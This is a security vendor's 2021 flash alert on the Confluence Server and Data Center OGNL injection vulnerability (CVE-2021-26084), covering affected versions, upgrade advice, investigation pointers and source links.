ANNOUNCEMENT: Security On-Demand Announces Grant Award of $1.2 Million | SEE RELEASE →

HR Photos for Marina (2)

Atlassian Confluence Server and Data Center RCE Vulnerability

3 September, 2021

Executive Summary

Atlassian Confluence and the U.S. Cyber Command have issued a security advisory regarding an OGNL injection vulnerability that exists in multiple versions of the Confluence Server and Data Center products.

This Remote Code Execution (RCE) vulnerability could allow authenticated users, and in some cases, unauthenticated users to execute arbitrary code on a Confluence Server or Data Center instance.  Exploits have been observed in the wild and fixes have been provided.  This does not affect Confluence Cloud customers.

 

Details

CVE-2021-26084 – Confluence Server Security Advisory

This vulnerability exists in on premise Confluence Server and Data center instances and can be accessed by non-administrator users or, potentially, unauthenticated users if the “Allow people to sign up to create their account” option is enabled.

To check if this function is enabled go to:
COG > User Management > User Signup Options

Affected Versions

Before version 6.13.23
From version 6.14.0 before 7.4.11
From version 7.5.0 before 7.11.6
From version 7.12.0 before 7.12.5

Proof of Concept code has been publicly available since August 31, 2021 and active exploitation has been observed since September 2, 2021.

 

Recommendations

Atlassian Confluence recommends upgrading to latest the Long Term Support release, which can be found here.  More information on these fixes can be found in the sources section at the bottom of this Flash Alert.

If it is not possible to upgrade at this time, a temporary workaround has been provided and can be found in the “Mitigation” section of the Confluence Security Advisory.

If a potential compromise has occurred, the following should be investigated:

Curl Utility – The Curl utility is often used by malicious actors to download additional payloads on compromised Linux systems.

It may also be necessary to identify any recent processes that have been launched by the Atlassian Confluence server app.

Again, Confluence Cloud customers are not affected.

 

SOD Actions

If your organization possesses on premise Confluence Server and Data Center instances, we request that you provide us with the asset IP and any/all identifying information.

The Security On-Demand Threat Recon Unit will continue to monitor these events and provide relevant updates.  SOD is not affected by this vulnerability.

If you have any questions about this alert, please contact your Security On-Demand Customer Success Manager.

 

Sources

CISA Security Advisory

Confluence Security Advisory – OGNL Vulnerability Security Advisory

Confluence Release Notes – Long Term Support Release Notes and Links

Confluence Server and Data Center Download – Long Term Support Download Center

CVE-2021-26084 – Atlassian Issue Tracker

MITRE CVE-2021-26084 – Confluence Server and Data Center Vulnerability

NIST CVE-2021-26084 – Confluence Server and Data Center Vulnerability

CVE-2021-26084 – Rapid7 Analysis, Triggers and Vulnerability Checks

Confluence RCE – GitHub Write-up and POC